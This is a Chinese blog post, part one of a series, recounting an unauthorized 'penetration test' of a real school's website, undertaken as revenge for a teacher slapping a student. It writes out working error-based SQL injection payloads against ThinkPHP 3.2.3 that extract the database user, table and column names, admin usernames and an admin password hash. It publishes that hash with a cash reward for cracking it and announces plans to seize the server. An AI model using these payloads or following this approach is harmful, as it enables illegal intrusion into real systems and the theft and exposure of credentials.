晚安 "你别急,我会慢慢的走出你的世界,不留痕迹"
针对某个打学生的学校官网渗透测试【上】
发表于 2020-2-10 | | 挖洞骚姿势

 

事情经过

今天在群里,吹水,看见群主是个小妹妹,就上前搭讪巴拉了几句,没想到得知小妹妹已经不上学了,退学了。我好奇心的问了一下为什么。“小妹妹说:刚到那个班的时候,进去老师就扇了她一巴掌,还羞辱她。”,这时候我就忍不下去了。我觉得为人师表,学生到底犯错了什么,容得你去打她?更何况扇巴掌,你让她以后的人生怎么办?

开始

得到了小妹妹学校的名字,百度到了学校的官网,接下来就是渗透的开始了。
打开主站

目睹了一下,有防火墙不能使用工具扫描,手测了一些敏感目录,admin.php【存在:后台】notice.php【存在:OA】.
观察url规则:index.php/Show/index/id/651.html —> 疑似thinkphp,单引号尝试.得到ThinkPHP3.2.3

存着报错型注入,手注测试(网站存着waf)。
) and 1=(updatexml(1,concat(0x7e,(select user()),0x7e),1)) -- 得到数据库用户名

) and 1=(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)) -- 得到数据库的库

因为注入不是root权限不可以直接写shell,我们只好利用注入得到后台用户名密码进入后台拿shell看看。继续跟进jw_admin表。
) and 1=(updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='jw_admin'),0x7e),1)) -- 得到jw_admin里面的列

继续跟进username,password。

得到用户名webmaster,admin,mzjys,mzzjc,mzj。因为updatexml语句的数据限制32位,我们需要使用substring函数截取。这里特别感谢一下预言师傅,放弃了王者时间来和我探讨这个问题。手动@一下预言师傅:@预言
) and 1=(updatexml(1,concat(0x7e,(select substring(password,1,16) from jw_admin limit 0,1),0x7e),1)) -- 先得到password数据的前16位在继续得到后面十六位。

) and 1=(updatexml(1,concat(0x7e,(select substring(password,17,32) from jw_admin limit 0,1),0x7e),1)) -- 再得到password数据的后16位

得到完整的md5加密的密码,但是各大解密平台都解不开,下面分享出来:

c70a3343dab9eba8a368457b56c6c7d4如有老哥解密出来10元红包献上。

后言

这个只是针对该企业的第一步,后面我会继续深入直到拿到服务器权限。也会尽快写出文章分享出来的。请敬请期待我们的精彩表演。
文章最后感谢团队的几位老哥,【n1Sdkw】【共产主义接班人】【Polar Jons】。以及放下王者时间的【预言】
后面的渗透请等待,已经开始写了。

发表评论:

TOP